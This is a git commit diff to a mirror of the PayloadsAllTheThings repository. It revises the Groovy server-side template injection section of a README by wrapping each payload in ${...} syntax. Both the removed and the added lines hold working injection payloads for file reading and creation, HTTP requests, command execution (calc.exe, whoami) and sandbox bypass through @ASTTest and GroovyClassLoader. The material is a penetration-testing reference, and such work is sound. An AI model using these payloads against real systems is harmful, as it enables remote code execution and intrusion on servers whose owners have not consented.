mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 21:05:27 +00:00
Update README.md
parent
7d290ded54
commit
59cae2ddb4
@ -194,48 +194,45 @@ ${dwf.newInstance(ec,null)("id")}
|
|||||||
|
|
||||||
[Official website](https://groovy-lang.org/)
|
[Official website](https://groovy-lang.org/)
|
||||||
|
|
||||||
|
|
||||||
### Groovy - Basic injection
|
### Groovy - Basic injection
|
||||||
|
|
||||||
Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
|
Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
|
||||||
|
|
||||||
|
|
||||||
### Groovy - Read and create File
|
### Groovy - Read and create File
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
String x = new File('c:/windows/notepad.exe').text
|
${String x = new File('c:/windows/notepad.exe').text}
|
||||||
String x = new File('/path/to/file').getText('UTF-8')
|
${String x = new File('/path/to/file').getText('UTF-8')}
|
||||||
new File("C:\Temp\FileName.txt").createNewFile();
|
${new File("C:\Temp\FileName.txt").createNewFile();}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Groovy - HTTP request:
|
### Groovy - HTTP request:
|
||||||
|
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
"http://www.google.com".toURL().text
|
${"http://www.google.com".toURL().text}
|
||||||
new URL("http://www.google.com").getText()
|
${new URL("http://www.google.com").getText()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Groovy - Command Execution
|
### Groovy - Command Execution
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
"calc.exe".exec()
|
${"calc.exe".exec()}
|
||||||
"calc.exe".execute()
|
${"calc.exe".execute()}
|
||||||
this.evaluate("9*9") //(this is a Script)
|
${this.evaluate("9*9") //(this is a Script class)}
|
||||||
new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
|
${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Groovy - Sandbox Bypass
|
### Groovy - Sandbox Bypass
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
|
${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
|
||||||
def x
|
def x }
|
||||||
```
|
```
|
||||||
|
|
||||||
or
|
or
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
|
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
---
|
||||||
|